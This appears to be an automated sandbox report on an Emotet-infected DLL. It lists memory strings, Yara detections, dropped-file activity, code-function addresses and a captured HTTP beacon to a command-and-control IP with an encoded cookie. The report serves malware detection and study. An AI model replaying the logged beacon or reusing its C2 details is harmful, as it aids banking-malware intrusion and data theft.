                      Source: svchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000E.00000002.305963685.000002890D42A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000E.00000002.305994082.000002890D443000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000E.00000003.305676490.000002890D442000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.305653202.000002890D441000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.305994082.000002890D443000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000E.00000003.305631055.000002890D45A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.306018853.000002890D45B000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.305653202.000002890D441000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000019.00000003.368117861.000002854CB77000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368199872.000002854D002000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368168723.000002854CB98000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000E.00000003.305624378.000002890D45F000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000E.00000003.305631055.000002890D45A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.306018853.000002890D45B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000E.00000002.306018853.000002890D45B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000E.00000003.305602622.000002890D449000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.305994082.000002890D443000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000E.00000002.305987582.000002890D43E000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000E.00000003.283947646.000002890D432000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000E.00000002.305987582.000002890D43E000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000E.00000002.305947613.000002890D413000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.305987582.000002890D43E000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000E.00000003.305670274.000002890D457000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000E.00000003.305670274.000002890D457000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000E.00000003.305653202.000002890D441000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000E.00000003.283947646.000002890D432000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.305980684.000002890D43C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000E.00000002.306010313.000002890D44E000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.305602622.000002890D449000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 00000019.00000003.368117861.000002854CB77000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368199872.000002854D002000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368168723.000002854CB98000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000019.00000003.368117861.000002854CB77000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368199872.000002854D002000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368168723.000002854CB98000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000019.00000003.369209327.000002854CB7F000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/
                      Source: svchost.exe, 00000019.00000003.369220229.000002854CB90000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.369209327.000002854CB7F000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.369173793.000002854CBA7000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.369239661.000002854D002000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.369187106.000002854CBA7000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04211027 InternetReadFile,
                      Source: global trafficHTTP traffic detected: GET /mORDXFCTowJiEI HTTP/1.1Cookie: komdJdlT=TUmhOHjsq0jpdGYwwvuYW84t0VBz8jE3ieyufpTPSdsSjuFT9qN1vMRROT8XX34gAF8S6dpwUc+oH5xz0lXr75zGC35p3jlBRFBy5IujQdhnOqTtUqxCGNYrbZrmR2afdnZt5Wh/ofDgB2jcFQw6+VQQ2JIP7HCr+Pn9kzeVvkTqaBMsd4PXWCuDfSYazrGRqNltBGE0OeF7XD2oZRFmR54nZGCBwDANUxBVGwEA6yHtFefhr4En4Q==Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.5:49759 version: TLS 1.2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10013EC9 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 7.2.rundll32.exe.4eb0000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4bc0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4bc0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4900000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4eb0000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4820000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.28a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2730000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2b90000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.28a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3f50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4ae0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.2de0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4da0000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4900000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4ec0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4e60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4e60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4820000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4b60000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4bc0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ca0000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2730000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2b90000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4da0000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.5030000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ca0000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4b60000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4ae0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4bc0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4ec0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3f50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.2de0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.5030000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.644665975.0000000004820000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.642932572.0000000002730000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.645532661.0000000004CA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.251093887.0000000005030000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.645241270.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.248189238.00000000028A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.250243016.0000000002DE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.250730251.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.645897262.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.252637909.0000000003F50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.250606997.0000000004AE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.644831234.0000000004900000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.251012589.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.643684713.0000000002B90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.645743036.0000000004DA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.250937948.0000000004E60000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.645105513.0000000004B60000.00000040.00000001.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: MakbLShaqA.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Sxdbowjvh\qaursesh.cky:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Sxdbowjvh\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10046A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10010E3B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_1003FFA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2CAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E12A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E27BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E19384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E308D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E290BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E12043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E13845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2D99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2AEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2DEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2ECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E14C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1F41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E20ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1DAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E15AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E17283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E19A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E25220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1D223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E31A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E11A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1E21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E303F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1A3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E24BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E243B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2B397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E31343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E13345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E16B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E30B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E12309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2A8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E130F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E278A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E298BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2D091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1A048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2F83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2B1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E31193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2F14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1C158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E15923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E3292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2BEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E27ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1FEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2D6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E30687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E24E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E12654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E19E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2BFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E16FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E22FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1BFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E14F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E21F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E13F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2CCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E244AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1CC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E13C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1AC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2AC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E11C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2E441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1EC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E18C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E21C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E155E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1C5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E325C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E29DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E24D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1FD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E13502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2FD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E1251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028ECAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E43B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DCC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E4E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028F0687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D7283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EAC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DAC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D3C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028ED091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DDAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E44AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028ED6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E78A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DFEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E98BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E90BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D5AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EBEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E0ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028ECCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028F08D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E7ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EAEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EDEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D30F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EA8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D8C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D1A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D4C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DE21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DF41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E1C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DEC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E5220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DD223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D9E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EF83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028F1A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DA048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D3845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D2A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D2043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EE441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D2654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D9A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D1C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E4D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D4F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D9384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028ED99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EB397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DFD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028F1193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E4BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E2FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E9DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EB1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DBFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E7BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D6FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028F25C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DA3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D55E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EBFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DC5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028F03F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D2309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D3502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EFD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028F292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D6B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D5923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028F0B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EF14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D3345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028F1343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D3F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028DC158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E1F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028E577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F943B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9CAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8C5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03FA03F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F855E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9BFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8A3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03FA25C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F86FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F97BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9B1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8BFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F94BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F99DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F92FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9D99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8FD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03FA1193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9B397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F94D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F84F8E
